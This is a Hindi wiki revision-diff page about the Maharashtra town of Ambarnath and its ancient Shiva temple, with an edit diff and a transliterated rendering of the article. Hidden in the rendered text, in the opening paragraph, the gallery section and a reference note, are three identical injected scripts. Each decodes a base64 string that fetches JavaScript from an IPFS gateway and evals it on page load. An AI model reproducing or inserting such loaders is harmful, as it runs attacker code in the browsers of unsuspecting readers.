Difference between revisions of "अंबरनाथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 3 users not shown)
Line 32: Line 32:
  
 
*अंबरनाथ मध्य रेलवे का एक स्टेशन भी है, जो नगर से लगभग एक मील पूर्व दिशा में स्थित है।
 
*अंबरनाथ मध्य रेलवे का एक स्टेशन भी है, जो नगर से लगभग एक मील पूर्व दिशा में स्थित है।
*यहाँ से एक मील से भी कम की दूरी पर पूर्व की ओर एक प्राचीन [[हिन्दू]] देवालय है, जो प्राचीन हिन्दू शिल्प विद्या का एक ज्वलंत उदाहरण है।
+
*यहाँ से एक मील से भी कम की दूरी पर [[पूर्व दिशा|पूर्व]] की ओर एक प्राचीन [[हिन्दू]] देवालय है, जो प्राचीन हिन्दू शिल्प विद्या का एक ज्वलंत उदाहरण है।
*ग्यारहवीं [[शताब्दी]] के मध्य में बना अंबरनाथ शिव मंदिर यहाँ के सबसे समृद्ध मंदिरों में एक है।
+
*ग्यारहवीं [[शताब्दी]] के मध्य में बना '''अंबरनाथ शिव मंदिर''' यहाँ के सबसे समृद्ध मंदिरों में एक है।
*वलधान नदी के तट पर बना मंदिर इमली और [[आम]] के पेड़ों से घिरा हुआ है। मंदिर की [[वास्तुकला]] उच्चकोटि की है।
+
*वलधान नदी के तट पर बना मंदिर [[इमली]] और [[आम]] के पेड़ों से घिरा हुआ है। मंदिर की [[वास्तुकला]] उच्चकोटि की है।
 
*देवालय अब [[खंडहर]] सा हो गया है। इसके अंतर्गत 1060 ई. का एक प्राचीन [[शिलालेख]] पाया गया है।
 
*देवालय अब [[खंडहर]] सा हो गया है। इसके अंतर्गत 1060 ई. का एक प्राचीन [[शिलालेख]] पाया गया है।
 
*मंदिर की मुख्य मूर्तियों में एक त्रैमस्तकी मूर्ति, जिसके घुटनों पर एक नारी भी उपविष्ट है, मुख्य है। संभवत यह मूर्ति [[शिव]]-[[पार्वती]] को निरूपित करने के हेतु निर्मित की गई थी।
 
*मंदिर की मुख्य मूर्तियों में एक त्रैमस्तकी मूर्ति, जिसके घुटनों पर एक नारी भी उपविष्ट है, मुख्य है। संभवत यह मूर्ति [[शिव]]-[[पार्वती]] को निरूपित करने के हेतु निर्मित की गई थी।
*यहाँ पर माघ मास ([[फ़रवरी]]-[[मार्च]]) में '[[शिवरात्रि]]' के पर्व पर एक मेला लगता है।
+
*यहाँ पर [[माघ मास]] ([[फ़रवरी]]-[[मार्च]]) में '[[शिवरात्रि]]' के पर्व पर एक मेला लगता है।
 
*अंबरनाथ में [[दियासलाई]] का एक कारखाना भी है।
 
*अंबरनाथ में [[दियासलाई]] का एक कारखाना भी है।
*क्षेत्रफल की दृष्टि से अंबरनाथ 2.6 वर्ग मील में विस्तृत है।<ref>{{cite web |url=http://khoj.bharatdiscovery.org/w/index.php?title=%E0%A4%85%E0%A4%82%E0%A4%AC%E0%A4%B0%E0%A4%A8%E0%A4%BE%E0%A4%A5&action=edit|title=अंबरनाथ|accessmonthday=01 फ़रवरी|accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
*क्षेत्रफल की दृष्टि से अंबरनाथ 2.6 वर्ग मील में विस्तृत है।<ref>{{cite web |url=http://bharatkhoj.org/w/index.php?title=%E0%A4%85%E0%A4%82%E0%A4%AC%E0%A4%B0%E0%A4%A8%E0%A4%BE%E0%A4%A5&|title=अंबरनाथ|accessmonthday=01 फ़रवरी|accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Shiva-Temple-Ambarnath-1.jpg|शिव मन्दिर, अंबरनाथ
 +
चित्र:Shiva-Temple-Ambarnath-2.jpg|वास्तुकला, शिव मन्दिर, अंबरनाथ
 +
</gallery>
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{महाराष्ट्र के नगर}}{{महाराष्ट्र के पर्यटन स्थल}}
 
{{महाराष्ट्र के नगर}}{{महाराष्ट्र के पर्यटन स्थल}}
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र_के_नगर]][[Category:महाराष्ट्र के पर्यटन स्थल]][[Category:भारत_के_नगर]][[Category:पर्यटन कोश]][[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र_के_नगर]][[Category:महाराष्ट्र के पर्यटन स्थल]][[Category:भारत_के_नगर]][[Category:पर्यटन कोश]][[Category:ऐतिहासिक स्थान कोश]][[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:00, 18 May 2018

aanbaranath
vivaran 'aanbaranath' muanbee se 38 mil ki doori par sthit ek nagar hai. nagar bhagavan 'aanbaranath' ko samarpit mandir ke karan lokapriy hai.
rajy maharashtr
kshetraphal 2.6 varg mil
udyog yahaan diyasalaee ka ek karakhana hai
sanbandhit lekh maharashtr, shiv
any janakari aanbaranath mean shilahat naresh maanbani dvara nirmit shiv ka mandir hai, jise koankan ka sarvaprachin devalay mana jata hai.

aanbaranath athava 'amaranath' maharashtr ke muanbee se 38 mil (lagabhag 60.8 ki.mi.)<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> ki doori par sthit ek nagar hai. yah thana zile ke kalyan taluka ka nagar hai. nagar bhagavan 'aanbaranath' ko samarpit mandir ke karan lokapriy hai. aanbaranath mean shilahat naresh maanbani dvara nirmit shiv ka mandir hai, jise koankan ka sarvaprachin devalay mana jata hai.

  • aanbaranath madhy relave ka ek steshan bhi hai, jo nagar se lagabhag ek mil poorv disha mean sthit hai.
  • yahaan se ek mil se bhi kam ki doori par poorv ki or ek prachin hindoo devalay hai, jo prachin hindoo shilp vidya ka ek jvalant udaharan hai.
  • gyarahavian shatabdi ke madhy mean bana aanbaranath shiv mandir yahaan ke sabase samriddh mandiroan mean ek hai.
  • valadhan nadi ke tat par bana mandir imali aur am ke pe doan se ghira hua hai. mandir ki vastukala uchchakoti ki hai.
  • devalay ab khandahar sa ho gaya hai. isake aantargat 1060 ee. ka ek prachin shilalekh paya gaya hai.
  • mandir ki mukhy moortiyoan mean ek traimastaki moorti, jisake ghutanoan par ek nari bhi upavisht hai, mukhy hai. sanbhavat yah moorti shiv-parvati ko niroopit karane ke hetu nirmit ki gee thi.
  • yahaan par magh mas (faravari-march) mean 'shivaratri' ke parv par ek mela lagata hai.
  • aanbaranath mean diyasalaee ka ek karakhana bhi hai.
  • kshetraphal ki drishti se aanbaranath 2.6 varg mil mean vistrit hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aanbaranath (hindi). . abhigaman tithi: 01 faravari, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh